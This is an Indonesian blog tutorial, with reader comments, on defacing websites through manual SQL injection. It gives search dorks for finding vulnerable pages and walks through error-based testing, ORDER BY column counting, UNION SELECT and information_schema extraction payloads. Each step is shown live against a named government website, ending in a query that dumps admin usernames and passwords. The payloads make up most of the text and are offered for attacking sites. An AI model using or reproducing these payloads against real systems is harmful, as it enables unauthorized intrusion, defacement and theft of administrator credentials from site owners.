tutorial deface sql injection
Pada Tutorial Kali ini ,Saya akan Share Tutorial Deface Sql Manual
dork :
- inurl:/staff.php?id=
- inurl:/news.php?id=
kembangin sendiri gan.
Nah Langsung Aja Karena Saya Udah Nemu Situs Yang Vuln Sql ,Oh iya Untuk Mengetahui Vuln Atau Tidak Kalian Hanya Perlu Masukan tanda ( ' ) di belakang angka Id nya, Contoh :
http://www.utama.tegalkab.go.id/artikel.php?id=113' Nah Kek gitu deh, maka muncul You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
jika sudah ketemu ,kalian tinggal masukan +order+by+1--+- ,Jadinya :
http://www.utama.tegalkab.go.id/artikel.php?id=113+order+by+1--+-
Kalian Terusin Sampai Ketemu Error ,jadinya
http://www.utama.tegalkab.go.id/artikel.php?id=113+order+by+1--+- => Ga error
http://www.utama.tegalkab.go.id/artikel.php?id=113+order+by+2--+- Ga error
http://www.utama.tegalkab.go.id/artikel.php?id=113+order+by+3--+- Ga error
Sampai eror ya gan,
Nah disini saya eror di http://www.utama.tegalkab.go.id/artikel.php?id=113+order+by+9--+- Maka di Pastikan Table nya ada 8, Jika Sudah Gitu Kalian Tinggal ganti +order+by dengan +union+select,jangan lupa di kasih tanda (-) di depan angka id.
jadinya : http://www.utama.tegalkab.go.id/artikel.php?id=-1+union+select+3--+- karena tadi table nya ada 8 http://www.utama.tegalkab.go.id/artikel.php?id=1+union+select+1,2,3,4,5,6,7,8--+- .Maka Akan Terlihat angka Ajaib Nya.
Saya akan pilih Angka Dua Aja Biar Mesra wkwkwk.Sekarang Kita masukan inject nya .
inject : (select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)
Masukan Pas di angka yang muncul Tadi ,
Nah Jika Sudah Lihat, Kalian Tinggal Dump istilahnya, Atau Buka Table Caranya Dengan Masukan Inject : /*!50000(SELECT+GROUP_CONCAT(username,0x3a,password+SEPARATOR+0x3c62723e)+FROM+utenti)*/
Disini user dan password saya di Table admin.dan nama table adminnya admin_username. dan passwordnya admin_password. Jadi kalian edit inject nya jadi : /*!50000(SELECT+GROUP_CONCAT([user_id],0x3a,[user_pw]+SEPARATOR+0x3c62723e)+FROM+[securityTab])*/
Yang Saya Tandai [ ] Yang Harus Kalian Ganti.
Maka Jadinya : http://www.utama.tegalkab.go.id/artikel.php?id=-1+union+select+1,/*!50000(SELECT+GROUP_CONCAT(admin_username,0x3a,admin_password+SEPARATOR+0x3c62723e)+FROM+admin)*/,3,4,5,6,7,8,9,10--+-
Nanti Saat Kalian Buka ,Akan Muncul user + password .
Itu Security tab nya di isi apa ya
ReplyDeletemantap slurr.
ReplyDeleteSobatLH
Wow
ReplyDeletegalaucrew.tech
ReplyDeleteOy logo team gua ngapa ada disitu
ReplyDeleteMantap kali lah bang:v
ReplyDelete